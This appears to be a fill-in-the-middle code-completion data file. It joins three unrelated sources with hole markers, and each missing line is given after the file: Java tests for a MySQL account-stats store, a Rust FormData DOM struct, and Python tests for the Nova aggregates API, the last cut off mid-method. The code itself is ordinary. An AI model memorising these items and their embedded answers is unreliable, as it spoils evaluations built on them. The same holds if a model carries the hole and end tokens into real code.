Map<String, Map<String, Long>> monthlyContainerStorageUsages = mySqlStore.queryMonthlyAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(currentAggregatedStats, false),
monthlyContainerStorageUsages);
String obtainedMonthValue = mySqlStore.queryRecordedMonth();
assertTrue(obtainedMonthValue.equals(monthValue));
// Change the value and store it back to mysql database
monthValue = "2020-02";
currentAggregatedStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(currentAggregatedStats);
mySqlStore.takeSnapshotOfAggregatedAccountStatsAndUpdateMonth(monthValue);
monthlyContainerStorageUsages = mySqlStore.queryMonthlyAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(currentAggregatedStats, false),
monthlyContainerStorageUsages);
obtainedMonthValue = mySqlStore.queryRecordedMonth();
assertTrue(obtainedMonthValue.equals(monthValue));
// Delete the snapshots
mySqlStore.deleteSnapshotOfAggregatedAccountStats();
assertTrue(mySqlStore.queryMonthlyAggregatedAccountStats(false).isEmpty());
}
/**
* Test methods to store and fetch partition class, partition name partition id and partition class stats.
* @throws Exception
*/
@Test
public void testHostPartitionClassStats() throws Exception {
// First write some stats to account reports
testMultiStoreStats();
StatsWrapper accountStats1 = mySqlStore.queryAccountStatsByHost(hostname1, port1);
StatsWrapper accountStats2 = mySqlStore.queryAccountStatsByHost(hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
StatsWrapper accountStats3 = mySqlStore3.queryAccountStatsByHost(hostname3, port3);
// From this account stats, create partition class stats;
Set<String> allPartitionKeys = new HashSet<String>() {
{
addAll(accountStats1.getSnapshot().getSubMap().keySet());
addAll(accountStats2.getSnapshot().getSubMap().keySet());
addAll(accountStats3.getSnapshot().getSubMap().keySet());
}
};
List<String> partitionClassNames = Arrays.asList("default", "new");
Map<String, String> partitionKeyToClassName = new HashMap<>();
int ind = 0;
for (String partitionKey : allPartitionKeys) {
partitionKeyToClassName.put(partitionKey, partitionClassNames.get(ind % partitionClassNames.size()));
ind++;
}
StatsWrapper partitionClassStats1 =
convertAccountStatsToPartitionClassStats(accountStats1, partitionKeyToClassName);
StatsWrapper partitionClassStats2 =
convertAccountStatsToPartitionClassStats(accountStats2, partitionKeyToClassName);
StatsWrapper partitionClassStats3 =
convertAccountStatsToPartitionClassStats(accountStats3, partitionKeyToClassName);
mySqlStore.storePartitionClassStats(partitionClassStats1);
mySqlStore.storePartitionClassStats(partitionClassStats2);
mySqlStore3.storePartitionClassStats(partitionClassStats3);
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
assertEquals(new HashSet<>(partitionClassNames), partitionNameAndIds.keySet());
Map<String, String> dbPartitionKeyToClassName = partitionNameAndIds.entrySet()
.stream()
.flatMap(
ent -> ent.getValue().stream().map(pid -> new Pair<String, String>(ent.getKey(), "Partition[" + pid + "]")))
.collect(Collectors.toMap(Pair::getSecond, Pair::getFirst));
assertEquals(partitionKeyToClassName, dbPartitionKeyToClassName);
StatsWrapper obtainedStats1 = mySqlStore.queryPartitionClassStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(partitionClassStats1.getSnapshot(), obtainedStats1.getSnapshot());
StatsWrapper obtainedStats2 = mySqlStore.queryPartitionClassStatsByHost(hostname2, port2, partitionNameAndIds);
assertEquals(partitionClassStats2.getSnapshot(), obtainedStats2.getSnapshot());
StatsWrapper obtainedStats3 = mySqlStore3.queryPartitionClassStatsByHost(hostname3, port3, partitionNameAndIds);
assertEquals(partitionClassStats3.getSnapshot(), obtainedStats3.getSnapshot());
mySqlStore3.shutdown();
}
/**
* Test methods to store and fetch partition class, partition name partition id and partition class storage stats.
* @throws Exception
*/
@Test
public void testHostPartitionClassStorageStats() throws Exception {
// First write some stats to account reports
testMultiStoreStats();
HostAccountStorageStatsWrapper accountStats1 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
HostAccountStorageStatsWrapper accountStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
HostAccountStorageStatsWrapper accountStats3 = mySqlStore3.queryHostAccountStorageStatsByHost(hostname3, port3);
// From this account stats, create partition class stats;
Set<Long> allPartitionKeys = new HashSet<Long>() {
{
addAll(accountStats1.getStats().getStorageStats().keySet());
addAll(accountStats2.getStats().getStorageStats().keySet());
addAll(accountStats3.getStats().getStorageStats().keySet());
}
};
List<String> partitionClassNames = Arrays.asList("default", "new");
Map<Long, String> partitionIdToClassName = new HashMap<>();
int ind = 0;
for (long partitionId : allPartitionKeys) {
partitionIdToClassName.put(partitionId, partitionClassNames.get(ind % partitionClassNames.size()));
ind++;
}
HostPartitionClassStorageStatsWrapper partitionClassStats1 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats1, partitionIdToClassName);
HostPartitionClassStorageStatsWrapper partitionClassStats2 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats2, partitionIdToClassName);
HostPartitionClassStorageStatsWrapper partitionClassStats3 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats3, partitionIdToClassName);
mySqlStore.storeHostPartitionClassStorageStats(partitionClassStats1);
mySqlStore.storeHostPartitionClassStorageStats(partitionClassStats2);
mySqlStore3.storeHostPartitionClassStorageStats(partitionClassStats3);
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
assertEquals(new HashSet<>(partitionClassNames), partitionNameAndIds.keySet());
Map<Long, String> dbPartitionKeyToClassName = partitionNameAndIds.entrySet()
.stream()
.flatMap(ent -> ent.getValue().stream().map(pid -> new Pair<>(ent.getKey(), (long) pid)))
.collect(Collectors.toMap(Pair::getSecond, Pair::getFirst));
assertEquals(partitionIdToClassName, dbPartitionKeyToClassName);
// Fetch HostPartitionClassStorageStats
HostPartitionClassStorageStatsWrapper obtainedStats1 =
mySqlStore.queryHostPartitionClassStorageStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(partitionClassStats1.getStats().getStorageStats(), obtainedStats1.getStats().getStorageStats());
HostPartitionClassStorageStatsWrapper obtainedStats2 =
mySqlStore.queryHostPartitionClassStorageStatsByHost(hostname2, port2, partitionNameAndIds);
assertEquals(partitionClassStats2.getStats().getStorageStats(), obtainedStats2.getStats().getStorageStats());
HostPartitionClassStorageStatsWrapper obtainedStats3 =
mySqlStore3.queryHostPartitionClassStorageStatsByHost(hostname3, port3, partitionNameAndIds);
assertEquals(partitionClassStats3.getStats().getStorageStats(), obtainedStats3.getStats().getStorageStats());
// Fetch StatsSnapshot
StatsWrapper obtainedStats = mySqlStore.queryPartitionClassStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(
StorageStatsUtil.convertHostPartitionClassStorageStatsToStatsSnapshot(obtainedStats1.getStats(), false),
obtainedStats.getSnapshot());
mySqlStore3.shutdown();
}
/**
* Test methods to store, delete and fetch aggregated partition class stats.
* @throws Exception
*/
@Test
public void testAggregatedPartitionClassStats() throws Exception {
testHostPartitionClassStats();
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Now we should have partition class names and partition ids in database
// Construct an aggregated partition class report
StatsSnapshot aggregated =
TestUtils.makeAggregatedPartitionClassStats(partitionNameAndIds.keySet().toArray(new String[0]), 10, 10);
mySqlStore.storeAggregatedPartitionClassStats(aggregated);
partitionNameAndIds = mySqlStore3.queryPartitionNameAndIds();
StatsSnapshot aggregated3 =
TestUtils.makeAggregatedPartitionClassStats(partitionNameAndIds.keySet().toArray(new String[0]), 10, 10);
mySqlStore3.storeAggregatedPartitionClassStats(aggregated3);
StatsSnapshot obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(aggregated, obtained);
assertEquals(mySqlStore.queryAggregatedPartitionClassStatsByClusterName("random-cluster").getSubMap().size(), 0);
StatsSnapshot obtained3 = mySqlStore3.queryAggregatedPartitionClassStats();
assertEquals(aggregated3, obtained3);
// Change one value and store it to mysql database again
StatsSnapshot newSnapshot = new StatsSnapshot(aggregated);
newSnapshot.getSubMap()
.get("default")
.getSubMap()
.get(Utils.partitionClassStatsAccountContainerKey((short) 1, (short) 1))
.setValue(1);
newSnapshot.updateValue();
mySqlStore.storeAggregatedPartitionClassStats(aggregated);
obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(aggregated, obtained);
// Delete some account and container
newSnapshot = new StatsSnapshot(newSnapshot);
short accountId = (short) 1;
short containerId = (short) 1;
String accountContainerKey = Utils.partitionClassStatsAccountContainerKey(accountId, containerId);
for (String partitionClassName : partitionNameAndIds.keySet()) {
mySqlStore.deleteAggregatedPartitionClassStatsForAccountContainer(partitionClassName, accountId, containerId);
newSnapshot.getSubMap().get(partitionClassName).getSubMap().remove(accountContainerKey);
}
newSnapshot.updateValue();
obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(newSnapshot, obtained);
mySqlStore3.shutdown();
}
@Test
public void testAggregatedPartitionClassStorageStats() throws Exception {
testHostPartitionClassStorageStats();
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Now we should have partition class names and partition ids in database
// Construct an aggregated partition class report
AggregatedPartitionClassStorageStats aggregatedStats = new AggregatedPartitionClassStorageStats(
StorageStatsUtilTest.generateRandomAggregatedPartitionClassStorageStats(
partitionNameAndIds.keySet().toArray(new String[0]), (short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedPartitionClassStorageStats(aggregatedStats);
partitionNameAndIds = mySqlStore3.queryPartitionNameAndIds();
AggregatedPartitionClassStorageStats aggregatedStats3 = new AggregatedPartitionClassStorageStats(
StorageStatsUtilTest.generateRandomAggregatedPartitionClassStorageStats(
partitionNameAndIds.keySet().toArray(new String[0]), (short) 0, 10, 10, 10000L, 2, 10));
mySqlStore3.storeAggregatedPartitionClassStorageStats(aggregatedStats3);
AggregatedPartitionClassStorageStats obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(aggregatedStats.getStorageStats(), obtained.getStorageStats());
assertEquals(
mySqlStore.queryAggregatedPartitionClassStorageStatsByClusterName("random-cluster").getStorageStats().size(),
0);
AggregatedPartitionClassStorageStats obtained3 = mySqlStore3.queryAggregatedPartitionClassStorageStats();
assertEquals(aggregatedStats3.getStorageStats(), obtained3.getStorageStats());
// Fetch StatsSnapshot
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(StorageStatsUtil.convertAggregatedPartitionClassStorageStatsToStatsSnapshot(obtained, false),
obtainedSnapshot);
// Change one value and store it to mysql database again
Map<String, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStatsMap =
new HashMap<>(aggregatedStats.getStorageStats());
ContainerStorageStats origin = newStorageStatsMap.get("default").get((short) 1).get((short) 1);
newStorageStatsMap.get("default")
.get((short) 1)
.put((short) 1,
new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
mySqlStore.storeAggregatedPartitionClassStorageStats(new AggregatedPartitionClassStorageStats(newStorageStatsMap));
obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(newStorageStatsMap, obtained.getStorageStats());
// Delete some account and container
short accountId = (short) 1;
short containerId = (short) 1;<|fim▁hole|> mySqlStore.deleteAggregatedPartitionClassStatsForAccountContainer(partitionClassName, accountId, containerId);
newStorageStatsMap.get(partitionClassName).get(accountId).remove(containerId);
}
obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(newStorageStatsMap, obtained.getStorageStats());
mySqlStore3.shutdown();
}
private AccountStatsMySqlStore createAccountStatsMySqlStore(String clusterName, String hostname, int port)
throws Exception {
Path localBackupFilePath = createTemporaryFile();
Properties configProps = Utils.loadPropsFromResource("accountstats_mysql.properties");
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_CLUSTER_NAME, clusterName);
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_HOST_NAME, hostname);
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_DATACENTER_NAME, "dc1");
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_PORT, String.valueOf(port));
configProps.setProperty(AccountStatsMySqlConfig.DOMAIN_NAMES_TO_REMOVE, ".github.com");
configProps.setProperty(AccountStatsMySqlConfig.UPDATE_BATCH_SIZE, String.valueOf(batchSize));
configProps.setProperty(AccountStatsMySqlConfig.POOL_SIZE, String.valueOf(5));
configProps.setProperty(AccountStatsMySqlConfig.LOCAL_BACKUP_FILE_PATH, localBackupFilePath.toString());
VerifiableProperties verifiableProperties = new VerifiableProperties(configProps);
return (AccountStatsMySqlStore) new AccountStatsMySqlStoreFactory(verifiableProperties,
new ClusterMapConfig(verifiableProperties), new MetricRegistry()).getAccountStatsStore();
}
private static Path createTemporaryFile() throws IOException {
Path tempDir = Files.createTempDirectory("AccountStatsMySqlStoreTest");
return tempDir.resolve("localbackup");
}
private static StatsWrapper generateStatsWrapper(int numPartitions, int numAccounts, int numContainers,
StatsReportType reportType) {
Random random = new Random();
List<StatsSnapshot> storeSnapshots = new ArrayList<>();
for (int i = 0; i < numPartitions; i++) {
storeSnapshots.add(TestUtils.generateStoreStats(numAccounts, numContainers, random, reportType));
}
return TestUtils.generateNodeStats(storeSnapshots, 1000, reportType);
}
private static HostAccountStorageStatsWrapper generateHostAccountStorageStatsWrapper(int numPartitions,
int numAccounts, int numContainersPerAccount, StatsReportType reportType) {
HostAccountStorageStats hostAccountStorageStats = new HostAccountStorageStats(
StorageStatsUtilTest.generateRandomHostAccountStorageStats(numPartitions, numAccounts, numContainersPerAccount,
100000L, 2, 10));
StatsHeader statsHeader =
new StatsHeader(StatsHeader.StatsDescription.STORED_DATA_SIZE, 1000, numPartitions, numPartitions,
Collections.emptyList());
return new HostAccountStorageStatsWrapper(statsHeader, hostAccountStorageStats);
}
private void assertTableSize(AccountStatsMySqlStore mySqlStore, int expectedNumRows) throws SQLException {
int numRows = 0;
try (Connection connection = mySqlStore.getDataSource().getConnection()) {
try (Statement statement = connection.createStatement()) {
try (ResultSet resultSet = statement.executeQuery("SELECT * FROM " + AccountReportsDao.ACCOUNT_REPORTS_TABLE)) {
while (resultSet.next()) {
numRows++;
}
}
}
}
assertEquals(expectedNumRows, numRows);
}
private void assertTwoStatsSnapshots(StatsSnapshot snapshot1, StatsSnapshot snapshot2) {
assertEquals("Snapshot values are not equal", snapshot1.getValue(), snapshot2.getValue());
if (snapshot1.getSubMap() == null) {
assertNull(snapshot2.getSubMap());
} else {
assertEquals("Snapshot submap size mismatch", snapshot1.getSubMap().size(), snapshot2.getSubMap().size());
for (String key : snapshot1.getSubMap().keySet()) {
assertTrue(snapshot2.getSubMap().containsKey(key));
assertTwoStatsSnapshots(snapshot1.getSubMap().get(key), snapshot2.getSubMap().get(key));
}
}
}
private StatsWrapper convertAccountStatsToPartitionClassStats(StatsWrapper accountStats,
Map<String, String> partitionKeyToClassName) {
Map<String, StatsSnapshot> partitionClassSubMap = new HashMap<>();
StatsSnapshot originHostStats = accountStats.getSnapshot();
for (String partitionKey : originHostStats.getSubMap().keySet()) {
StatsSnapshot originPartitionStats = originHostStats.getSubMap().get(partitionKey);
String currentClassName = partitionKeyToClassName.get(partitionKey);
StatsSnapshot partitionClassStats =
partitionClassSubMap.computeIfAbsent(currentClassName, k -> new StatsSnapshot(0L, new HashMap<>()));
Map<String, StatsSnapshot> accountContainerSubMap = new HashMap<>();
for (String accountKey : originPartitionStats.getSubMap().keySet()) {
for (Map.Entry<String, StatsSnapshot> containerEntry : originPartitionStats.getSubMap()
.get(accountKey)
.getSubMap()
.entrySet()) {
String containerKey = containerEntry.getKey();
StatsSnapshot containerStats = new StatsSnapshot(containerEntry.getValue());
String accountContainerKey =
Utils.partitionClassStatsAccountContainerKey(Utils.accountIdFromStatsAccountKey(accountKey),
Utils.containerIdFromStatsContainerKey(containerKey));
accountContainerSubMap.put(accountContainerKey, containerStats);
}
}
long accountContainerValue = accountContainerSubMap.values().stream().mapToLong(StatsSnapshot::getValue).sum();
StatsSnapshot partitionStats = new StatsSnapshot(accountContainerValue, accountContainerSubMap);
partitionClassStats.getSubMap().put(partitionKey, partitionStats);
partitionClassStats.setValue(partitionClassStats.getValue() + accountContainerValue);
}
return new StatsWrapper(new StatsHeader(accountStats.getHeader()),
new StatsSnapshot(originHostStats.getValue(), partitionClassSubMap));
}
private HostPartitionClassStorageStatsWrapper convertHostAccountStorageStatsToHostPartitionClassStorageStats(
HostAccountStorageStatsWrapper accountStatsWrapper, Map<Long, String> partitionIdToClassName) {
HostPartitionClassStorageStats hostPartitionClassStorageStats = new HostPartitionClassStorageStats();
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> storageStats =
accountStatsWrapper.getStats().getStorageStats();
for (long partitionId : storageStats.keySet()) {
Map<Short, Map<Short, ContainerStorageStats>> accountStorageStatsMap = storageStats.get(partitionId);
String partitionClassName = partitionIdToClassName.get(partitionId);
for (short accountId : accountStorageStatsMap.keySet()) {
accountStorageStatsMap.get(accountId)
.values()
.forEach(containerStats -> hostPartitionClassStorageStats.addContainerStorageStats(partitionClassName,
partitionId, accountId, containerStats));
}
}
return new HostPartitionClassStorageStatsWrapper(new StatsHeader(accountStatsWrapper.getHeader()),
hostPartitionClassStorageStats);
}
}<|fim▁end|> | for (String partitionClassName : partitionNameAndIds.keySet()) { |
<|file_name|>formdata.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::utils::{Reflectable, Reflector, reflect_dom_object};
use dom::bindings::error::{Fallible};
use dom::bindings::codegen::FormDataBinding;
use dom::bindings::js::JS;
use dom::blob::Blob;
use dom::htmlformelement::HTMLFormElement;
use dom::window::Window;
use servo_util::str::DOMString;
use collections::hashmap::HashMap;
#[deriving(Encodable)]
pub enum FormDatum {
StringData(DOMString),
BlobData { blob: JS<Blob>, name: DOMString }
}
#[deriving(Encodable)]
pub struct FormData {
data: HashMap<DOMString, FormDatum>,
reflector_: Reflector,<|fim▁hole|> form: Option<JS<HTMLFormElement>>
}
impl FormData {
pub fn new_inherited(form: Option<JS<HTMLFormElement>>, window: JS<Window>) -> FormData {
FormData {
data: HashMap::new(),
reflector_: Reflector::new(),
window: window,
form: form
}
}
pub fn new(form: Option<JS<HTMLFormElement>>, window: &JS<Window>) -> JS<FormData> {
reflect_dom_object(~FormData::new_inherited(form, window.clone()), window, FormDataBinding::Wrap)
}
pub fn Constructor(window: &JS<Window>, form: Option<JS<HTMLFormElement>>)
-> Fallible<JS<FormData>> {
Ok(FormData::new(form, window))
}
pub fn Append(&mut self, name: DOMString, value: &JS<Blob>, filename: Option<DOMString>) {
let blob = BlobData {
blob: value.clone(),
name: filename.unwrap_or(~"default")
};
self.data.insert(name.clone(), blob);
}
pub fn Append_(&mut self, name: DOMString, value: DOMString) {
self.data.insert(name, StringData(value));
}
}
impl Reflectable for FormData {
fn reflector<'a>(&'a self) -> &'a Reflector {
&self.reflector_
}
fn mut_reflector<'a>(&'a mut self) -> &'a mut Reflector {
&mut self.reflector_
}
}<|fim▁end|> | window: JS<Window>, |
<|file_name|>test_aggregates.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 Citrix Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the aggregates admin api."""
from webob import exc
from nova.api.openstack.compute.contrib import aggregates
from nova import context
from nova import exception
from nova import test
from nova.tests import matchers
AGGREGATE_LIST = [
{"name": "aggregate1", "id": "1", "availability_zone": "nova1"},
{"name": "aggregate2", "id": "2", "availability_zone": "nova1"},
{"name": "aggregate3", "id": "3", "availability_zone": "nova2"},
{"name": "aggregate1", "id": "4", "availability_zone": "nova1"}]
AGGREGATE = {"name": "aggregate1",
"id": "1",
"availability_zone": "nova1",
"metadata": {"foo": "bar"},
"hosts": ["host1, host2"]}
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
class AggregateTestCase(test.NoDBTestCase):
"""Test Case for aggregates admin api."""
def setUp(self):
super(AggregateTestCase, self).setUp()
self.controller = aggregates.AggregateController()
self.req = FakeRequest()
self.context = self.req.environ['nova.context']
def test_index(self):
def stub_list_aggregates(context):
if context is None:
raise Exception()
return AGGREGATE_LIST
self.stubs.Set(self.controller.api, 'get_aggregate_list',
stub_list_aggregates)
result = self.controller.index(self.req)
self.assertEqual(AGGREGATE_LIST, result["aggregates"])
def test_create(self):
def stub_create_aggregate(context, name, availability_zone):
self.assertEqual(context, self.context, "context")
self.assertEqual("test", name, "name")
self.assertEqual("nova1", availability_zone, "availability_zone")
return AGGREGATE
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
result = self.controller.create(self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova1"}})
self.assertEqual(AGGREGATE, result["aggregate"])
def test_create_with_duplicate_aggregate_name(self):
def stub_create_aggregate(context, name, availability_zone):
raise exception.AggregateNameExists(aggregate_name=name)
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
self.assertRaises(exc.HTTPConflict, self.controller.create,
self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova1"}})
def test_create_with_incorrect_availability_zone(self):
def stub_create_aggregate(context, name, availability_zone):
raise exception.InvalidAggregateAction(action='create_aggregate',
aggregate_id="'N/A'",
reason='invalid zone')
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
self.assertRaises(exception.InvalidAggregateAction,
self.controller.create,
self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova_bad"}})
def test_create_with_no_aggregate(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"foo":
{"name": "test",
"availability_zone": "nova1"}})
def test_create_with_no_name(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"foo": "test",
"availability_zone": "nova1"}})
def test_create_with_no_availability_zone(self):
def stub_create_aggregate(context, name, availability_zone):
self.assertEqual(context, self.context, "context")
self.assertEqual("test", name, "name")
self.assertEqual(None, availability_zone, "availability_zone")
return AGGREGATE
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
result = self.controller.create(self.req,
{"aggregate": {"name": "test"}})
self.assertEqual(AGGREGATE, result["aggregate"])
def test_create_with_null_name(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"name": "",
"availability_zone": "nova1"}})
def test_create_with_name_too_long(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"name": "x" * 256,
"availability_zone": "nova1"}})
def test_create_with_extra_invalid_arg(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, dict(name="test",
availability_zone="nova1",
foo='bar'))
def test_show(self):
def stub_get_aggregate(context, id):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", id, "id")
return AGGREGATE
self.stubs.Set(self.controller.api, 'get_aggregate',
stub_get_aggregate)
aggregate = self.controller.show(self.req, "1")
self.assertEqual(AGGREGATE, aggregate["aggregate"])
def test_show_with_invalid_id(self):
def stub_get_aggregate(context, id):
raise exception.AggregateNotFound(aggregate_id=2)
self.stubs.Set(self.controller.api, 'get_aggregate',
stub_get_aggregate)
self.assertRaises(exc.HTTPNotFound,
self.controller.show, self.req, "2")
def test_update(self):
body = {"aggregate": {"name": "new_name",
"availability_zone": "nova1"}}
def stub_update_aggregate(context, aggregate, values):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual(body["aggregate"], values, "values")
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_only_name(self):
body = {"aggregate": {"name": "new_name"}}
def stub_update_aggregate(context, aggregate, values):
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_only_availability_zone(self):
body = {"aggregate": {"availability_zone": "nova1"}}
def stub_update_aggregate(context, aggregate, values):
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_no_updates(self):
test_metadata = {"aggregate": {}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_no_update_key(self):
test_metadata = {"asdf": {}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_wrong_updates(self):
test_metadata = {"aggregate": {"status": "disable",
"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_null_name(self):
test_metadata = {"aggregate": {"name": ""}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_name_too_long(self):
test_metadata = {"aggregate": {"name": "x" * 256}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_bad_aggregate(self):
test_metadata = {"aggregate": {"name": "test_name"}}
def stub_update_aggregate(context, aggregate, metadata):
raise exception.AggregateNotFound(aggregate_id=2)
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.update,
self.req, "2", body=test_metadata)
def test_invalid_action(self):
body = {"append_host": {"host": "host1"}}
self.assertRaises(exc.HTTPBadRequest,
self.controller.action, self.req, "1", body=body)
def test_add_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual("host1", host, "host")
return AGGREGATE
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
aggregate = self.controller.action(self.req, "1",
body={"add_host": {"host":
"host1"}})
self.assertEqual(aggregate["aggregate"], AGGREGATE)
def test_add_host_with_already_added_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.AggregateHostExists(aggregate_id=aggregate,
host=host)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
self.assertRaises(exc.HTTPConflict, self.controller.action,
self.req, "1",
body={"add_host": {"host": "host1"}})
def test_add_host_with_bad_aggregate(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bogus_aggregate",
body={"add_host": {"host": "host1"}})
def test_add_host_with_bad_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.ComputeHostNotFound(host=host)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1",
body={"add_host": {"host": "bogus_host"}})<|fim▁hole|>
def test_add_host_raises_key_error(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise KeyError
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
#NOTE(mtreinish) The check for a KeyError here is to ensure that
# if add_host_to_aggregate() raises a KeyError it propagates. At
# one point the api code would mask the error as a HTTPBadRequest.
# This test is to ensure that this doesn't occur again.
self.assertRaises(KeyError, self.controller.action, self.req, "1",
body={"add_host": {"host": "host1"}})
def test_remove_host(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual("host1", host, "host")
stub_remove_host_from_aggregate.called = True
return {}
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.controller.action(self.req, "1",
body={"remove_host": {"host": "host1"}})
self.assertTrue(stub_remove_host_from_aggregate.called)
def test_remove_host_with_bad_aggregate(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bogus_aggregate",
body={"remove_host": {"host": "host1"}})
def test_remove_host_with_host_not_in_aggregate(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
raise exception.AggregateHostNotFound(aggregate_id=aggregate,
host=host)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1",
body={"remove_host": {"host": "host1"}})
def test_remove_host_with_bad_host(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
